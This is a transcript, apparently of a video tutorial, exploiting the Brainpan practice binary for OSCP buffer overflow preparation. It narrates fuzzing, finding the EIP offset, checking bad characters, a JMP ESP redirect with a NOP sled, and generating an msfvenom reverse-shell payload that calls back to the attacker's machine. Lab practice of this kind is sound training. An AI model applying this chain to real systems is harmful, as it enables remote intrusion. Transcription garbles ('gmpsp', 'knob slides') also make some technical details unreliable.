Hey guys, it's me ActiveXSploit back again with a new video on the OSCP buffer overflow preparation series. And in today's video, we are going to exploit Brainpan. So Brainpan is an application made for buffer overflow practice, right? And it can be downloaded from Vulnhub. If you don't want to go with Vulnhub, you can just go on TryHackMe, and there's a room on TryHackMe related to Brainpan, right? So yeah, you can just go to TryHackMe, connect your VPN pack, and get started off by the buffer overflow practice. Also, if you haven't checked out the previous video on free float FTP server, make sure to check it out. So with that being said, let's get started. So I'll just start out by making a directory for Brainpan. So let's just say mkdir Brainpan, and let's just go to the directory. And now let's go to our Windows VM. So I got my Windows 7 VM over here, and I have my Brainpan binary in my downloads folder. So let me just move it to my desktop. So I'm just going to create a new folder, Brainpan, and I'll just move the Brainpan binary over here. So yeah, there we go. Alright, so I'm going to use X32DBG for today's video instead of Immunity Debugger, unlike in the last video, right? So if you want to use Immunity Debugger, you can just go with it, or any other debugger which you like, but I'll go with the X32DBG in today's video. So I'll just open this up, release X32 X32DBG. So I'm just going to run this as administrator. Alright, so our debugger is running. I'll just click on open, and I'll just go to my desktop. Brainpan, yep, there it is, and I'll just start the Brainpan server. Alright, so I'll just click on run, and I'll just allow access, and there we go. So it's running, and it says that it's listening on port 9999. So let's just go back to our Kali machine, and let's try connecting to that port, right? So 192.168.1.50.9999. And once we press enter, you see that it says welcome to Brainpan, enter the password. Alright, so as a penetration tester, we can manipulate this field, we can actually fuzz this field, I would say, to check whether if it is vulnerable to buffer overflow. So if I just type some random string over here, let's just say test, it says access denied. So what we can do is we can actually start fuzzing this entry point. So let's just open up a text editor, and I'll just increase the size. Whoops. And I'm going to save this file to my Brainpan folder. So fuzzer.py. Whoops, okay, it says permission denied. That's because of the root account which I'm using. So I'm just going to save this in my current directory. So let's just save it as fuzzer.py. And first we will start out by importing socket. So socket is a library used for creating TCP and UDP sockets, and we will use it to connect to our Brainpan service, right? And secondly, we will be importing the sys module, and lastly we will need the time module, right? So like in the previous video, we will just start out by declaring a particular buffer. So I'm just going to send 100 A's, and if you want to go with 1000, you can just go with 1000, but I always suggest to go with a small value, right? And now we will enter in a while true loop. So while true, and let's just create a try and except statement. So try except, and now let's create the TCP socket. So s equals to socket.socket, socket.af underscore inet, and socket.sock underscore stream. and let's just connect to our Brainpan service. So 192.168.1.50.9999, and let's receive for 1024 bytes. So now, if you wonder why we are receiving 1024 bytes, if you connect to the Brainpan service, as you can see, we basically get a prompt to enter the password, right? So the Brainpan service is actually sending us buffer. So we'll have to receive a buffer first, right? So we just type out s.receive 1024 bytes, and we finally send our buffer. So s.send buffer, and we just close the connection, or yeah, let's just close the connection, and then we are going to wait for 1 second, and we're just going to print out the buffer sent. So buffer sent, whoops, sorry for that, buffer sent str len buffer. So this is just going to print out the total buffer sent to the Brainpan service, right? And now we are simply going to increase the buffer by more 100 A's. So A into 100, and finally we just add an except statement. So let's just say print fuzzing crashed at bytes. Yep, there we go. So this line is similar to this one, so it's basically going to print the exact buffer length at which our program crashed, right? And finally we just exit out of the program. Alright, so this looks good. Let's just go back and run the fuzzer.py. It's actually over here. So python./fuzzer.py. Oops. And if you run it, as you can see, it says buffer sent. If we go back over here, there we go. As you can see, we get access violation. And if you see the flags register over here, as you can see, it says the EIP register points to 41414141, which is basically hex code for 4A's, right? And if you go back to our Kali machine, as you can see, it says fuzzing crashed at 700 bytes. But what we can do is we can actually start out by 600 bytes instead. If it doesn't work, we'll just switch to 700 bytes, right? So let's just restart the program. So I'm just going to restart it, and let's just go back, and let's just generate a pattern, right? So MSF pattern create dash L, and we're just going to say 600 bytes. Let's just copy this, and let's create a new variable called pattern equals to this. And this time, instead of sending the buffer, we are just going to send the pattern. So let's just start the fuzzer again. And there we go. So as you can see, our program crashes and we have the EIP register value over here. So in order to find the EIP offset, we're just going to click on copy value. It's going to go back over here, and let's say MSF pattern offset, and we just specify the -q flag. Whoops. Okay, so my clipboard is actually not working. I forgot that. So I'm just going to copy that over here. So EIP value is 357.24134. Let's just go back. MSF pattern underscore offset -q 357.24134. Alright, so as you can see, we got the offset, and it says exact match at offset 44. So we just found out the offset value, right? So we can just now get rid of this pattern variable, and we can just create another variable called offset equals to 44. Or let's just instead of creating a variable, let's just multiply it directly to our buffer. So 44, and now let's just send 4 B's at the end so that we can confirm that we are actually overwriting the EIP. Right, so this looks good. Let's just get rid of the while true loop, and let's just bring this one step back. Let's just run the fuzzer again, and let me verify if my Brainpan service is running. Okay, I actually have to restart it. Okay, so I think that our Brainpan actually didn't crash. So I believe. Oh, whoops! I actually have to modify the. I actually did a mistake over here. We actually had to send the buffer instead of the pattern. I forgot that. Sorry for that. Once again, let's send the buffer. And okay, it didn't crash. Let's check once again, right? Let me just comment this line out, and let's just once again go in it while through loop. Alright, so I guess our EIP offset value is wrong. I believe, yep, indeed it is wrong. So if you remember, the exact value at which program crashed was 700. So let's go with the 700 one this time. So MSF pattern create dash L 700. Oh, whoops, that's actually 7000. Sorry for that. Let's copy this once again. Pattern equals to this, and let's just send the pattern, right? Let's run the fuzzer once again, and there we go. So the program crashes, and once again we have our EIP offset value. It's actually the same which it was before. It's 35724 35724 Yep, indeed it is same. If I go back to my Kali machine, MSF pattern offset dash Q 357 24134. Okay, I guess I actually did a typing mistake. Oh my god, I actually did that. 356 24134. I'm really sorry for that, guys. I know due to one typo, it actually got messed up. So once again, sorry for that. Let's just go back. Uh, let's say offset equals to 524, or let's actually just multiply that instead of declaring that as a variable. So 524. Let's get rid of the pattern variable over here, and let's send 4 B's at the end so that we can confirm that we are overwriting the EIP. And instead of sending the pattern, we are going to send the buffer. Alright, so everything looks good. Once again, I apologize, my sincere apologies for the typo over there. I'm really sorry, it actually wasted my and your time. So once again, sorry for that. I'll just go back, python./fuzzer.py, and I'll just restart my VM. Whoops, not VM, my program. Let's go back to our Kali machine and let's just fire up the fuzzer. And there we go. As you can see, we finally overrated the EIP, so we can actually confirm that we are controlling the EIP. As the EIP pointer over here, it points to 42424242, which basically means it's basically an hex, the hex character for 4 Bs, right? So let's restart the program, and let's just go back to our Kali machine, and now we how to find bad characters in the program, right? So I'm just going to open up Firefox, and let's just search for bad character array, and you should get one blog saying identify bad characters manually, and I'll just copy the bad character array over here, and with the 4 B's at the end, let's just send the bad character array, right? So bad chars, whoops, and this looks correct. Let's just go back to our terminal. Let's fire up the fuzzer. Alright, so if you go back to our Windows VM, there we go. We actually we crashed the program, and in order to find bad characters, what you can do is if you are using the X32 debugger, you can use a plugin known as ERC in order to generate a byte array, and just you can just compare it um, with the bad characters with the bad character array, right? And if you're using Immunity Debugger, you can use the Mona plugin, which is a very known plugin. It can be used for generating byte array just like the ERC plugin, and you can just compare it with your bad character array, right? But we are going to be sticking with the manual way, so I'm just going to click on the ESP register over here, and I'm just going to click on follow and dump. Now we have 1 2 3 4 5 6 7 8 9. We have 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, and then we have 1A, 1B, 1C, 1D, 1E, 1F, and after 1F we have 20 over here, so 20, 21, 22, 23, 24, 25. Everything actually looks correct, but this actually requires eagle eyes to spot the bad characters. So let's just compare it once to with our bad character array. So I'll just stop the program. So we have 1 2 3 4 5 6 7 8 9. We have 0A, 0B, 0C, D, E, F, and then we have 10 11 12 13 14, 10 11 12 13 14 15, 16 17 18 19, and after 19 we have 1A, 1B, 1C, 1D, and so on, 1E, 1F. And after that we have 20, 21, 22, 23, 24, 25, 26, 27, and this actually looks correct. So we have 30 over here, 31, 32, and so on. This actually looks correct. 40, 41, 50, 60, 70. And I think that this is completely correct. So let's just open up Google Chrome, and let's just go to that block which was identifying bad charge manually. And let's just copy this bad character array. Let's go back to our debugger, and let's just click on search for over here, find pattern actually, and let's just click on this. Alright, so as you can see, we find the exact pattern over here. So I guess there are no bad characters in the program, which is I guess it's only one bad character, I believe. No, wait, just a minute. Let's just click on Control E. Whoops. Let's click on OK, and there we go. So we have the exact pattern over here. So I believe that there are no bad characters. So let's just go back to our Kali machine, and let's just make a comment named bad charge. And the only bad character I believe is the null byte, which is x00, which is basically a terminator which terminates the program or the particular part of the shellcode. So let me be honest, I actually haven't solved this binary yet. It's actually, I'm performing this live. So we'll check if there are any bad characters while we are exploiting it, while we are generating the shellcode and just exploiting, sending the particular shellcode to the program. So let's just get rid of the bad character array. I'm just going to restart my program over here, and let's just type ERC. I hope my ERC plugin is installed. Whoops, my ERC plugin is not installed. Let's just go back to memory map. Let's click on the .text section and let's search for gmpsp command if we find one. And there we go, we actually find one gmpsp pointer, and the offset of that is the address of that is 311.712 f3. So I'll just note this down, which is 311.712 f3. Let's just go back and let's make a new comment called gmpesp 311.712 f3, and let me just separate this in spaces, and let's just make a new variable called gmpesp equals to xf3, x12, x17, x31. So we are storing all of the characters, the gmpesp address in reverse due to the little Indian architecture, right? So now let's just create a new variable called knob_slides. So knob_slides equals to x90 into 32. So we are going to multiply it by the value of 32, so we get enough space for shellcode. So if you don't know what exactly is knob, so knob is basically used for shellcode padding, so that we can get space to execute our shellcode, right? And now I'm just going to remove the b's over here, and let's just say gmp esp plus knob slides, and let's generate the shellcode. So msf venom -p windows exec, and cmd is equals to kyle.exe -fc. We're going to be generating in a C format. Whoops, sorry for that. And we're just going to say exit func equals to thread, and let's specify the bad charge, which is x00, and let's just wait for the shellcode. There we go. We have the shellcode, so let's just copy this. Let's create a new variable called shellcode. So shellcode equals to this, and alright, so everything looks good. Let's just send the shellcode after the knob slides, and let's check everything once again if everything is correct. Everything looks correct. I'm just going to go back to my Windows VM, and I'm going to set a breakpoint over here, right? So let's just set a breakpoint, and let's just start the fuzzer. So python./fuzzer.py. If we go back, as you can see, our breakpoint gets hit, and if we click on continue, as you can see, we pop calculator. So um, we were actually correct that there are no bad characters in the program. So now what we can do is we can just close this, and let's go back to our Kali machine. Let's just delete the shellcode over here, and let's generate a reverse shellcode. So msf venom -p windows shell underscore reverse tcp. lhost is equals to my Kali Linux IP address, which is, I believe, 192.168.1.4. lport equals to 4444 dash fc, and we have to specify exit func equals to thread. So if you don't know why we are doing this, this just stabilizes our shellcode. It's nothing else. So yeah, and finally we just specify the bad characters, which is x00, and let's just wait for our shellcode. There we go. We can just copy this, and we can just paste it over here. Alright, so let's actually refactor our script. So let's remove the while true loop now, as we don't need it anymore. And let's just remove this line too, this one too, and let's just say print payload sent check port 4444 for reverse shell. And in the except statement, we are just going to add error while connecting, or let's just say error connecting to the server. Alright, so everything looks good. Let's just actually add a comment, which is a good practice over here. So we simply just copy the command which we use to generate our shellcode, and we just copy it over here. So the person who wants to generate the shellcode can actually know that what exactly are the bad characters, or what command was used to generate the shellcode, right? So we can just change the lhost over here and the lport, and everything looks good. So our script actually looks good now, and we can just go back. Let's just restart the program. Let's just run this once again. Let's go back, python./fuzzer.py, but let me just listen up for incoming connections on port 4444. Let's fire up the script. Okay, so we didn't actually receive a reverse shell. Oh yeah, we had set a breakpoint, so let's just get rid of the breakpoint, and there we go. So as you can see, we get a reverse shell, and we basically have the administrator privileges, of course, because we started the program as an administrator, I believe. Alright, so that's all for today, guys. I know that I made a huge mistake due to a typo, and I sincerely apologize for that. Also, this was actually recorded live, so I didn't solve this challenge before I was solving it live. So yeah, that's all. I hope you liked the video. Make sure to leave a like and subscribe to the channel. So yeah, stay tuned, stay safe, and goodbye.